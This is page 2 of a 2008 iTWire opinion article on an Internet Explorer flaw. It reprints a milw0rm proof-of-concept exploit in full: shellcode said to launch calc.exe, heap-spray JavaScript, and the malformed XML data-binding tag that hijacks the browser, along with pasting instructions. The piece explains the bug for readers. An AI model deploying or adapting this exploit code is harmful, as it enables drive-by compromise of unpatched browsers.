Warning this article may contain opinions of the author that you and iTWire don't agree with.
Visit the last page to have your say in our forum.

No. 1 Story

Telstra adds one million mobile services, but Sensis plummets

Telstra has revealed the addition of almost one million new mobile services in the six months to December 2011, but Sensis revenues plummeted 24 percent in 12 months.

 read more
StumbleUponSubmit to redditShare this on TwitterShare on facebook | Print |PDF 

More From

Why the latest IE flaw proves Linux got it right from the start

David M Williams
Sunday, 21 December 2008 10:59

Opinion and Analysis

Page 2 of 3
This code snippet was published on exploit web site milw0rm.com and illustrates how the exploit works.

Microsoft Office 365 Get your free Trial

Related Articles

First, some pre-amble HTML markup.

<html>
<div id="replace">x</div>

<script>

Now the program script itself; the shellcode object contains the machine code instructions to execute a process, running calc.exe.

Note, I have broken this line up for readability but you ought to ensure it is all one continuous line when pasting it into a text editor:


var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536
%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a
%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe
%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2
%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3
%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81
%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f
%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba
%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e
%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c
%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");

The next piece of script code sprays the heap to push the memory address of the array onto it, in an effort to make it callable:

var spray = unescape("%u0a0a%u0a0a");


do {
   spray += spray;
} while(spray.length < 0xd0000);


memory = new Array();


for(i = 0; i < 100; i++)
   memory[i] = spray + shellcode;


And here is the exploit; the following XML tag is incorrectly handled in unpatched versions of Internet Explorer and will cause it to pass control to the memory address of the array, and therefore execute the program instructions it contains.

This too should be one continuous line in a text editor:

xmlcode = "<XML ID=I><X><C><![CDATA[<image
SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C>
</X></XML><SPAN DATASRC=#I DATAFLD=C
DATAFORMATAS=HTML><XML ID=I></XML><SPAN
DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
</SPAN></SPAN>";


tag = document.getElementById("replace");
tag.innerHTML = xmlcode;


</script>
</html>


Of course, while this example does nothing harmful, it has been noted that the vulnerability has been used to install Trojan horse programs elsewhere.

Microsoft offer instructions how to mitigate the effectiveness of this vulnerability and in so doing indirectly espouse the Linux viewpoint on secure computing. Let me explain.

CONTINUED






Start 1 2 3 Next 

Sponsored Announcements

Websense #1 in Web Security Fourth Year in a Row

David Bass | For the fourth year in a row, IDC has placed content security provider Websense (NASDAQ: WBSN) at the top of the IDC Worldwide Web Security 2011 –…

You may have missed


Advertisement

- sponsored feature -

The Death of Traditional BI: What’s Next?

How to Make Business Discovery Work for Your Business IP PABX BUYING GUIDE

Business Discovery takes its cues from consumer apps. Like Google, it encourages us- ers to hunt for and explore data without worrying about or even noticing the underly- ing technology. Their entire experience is working within an intuitive interface to get real-time, self-service results with only minimal training. ...more

Our Services for Technology Professionals

E - mail News SMS Headlines Desktop Alerts News Feeds Job Alerts Technology Events Press-Releases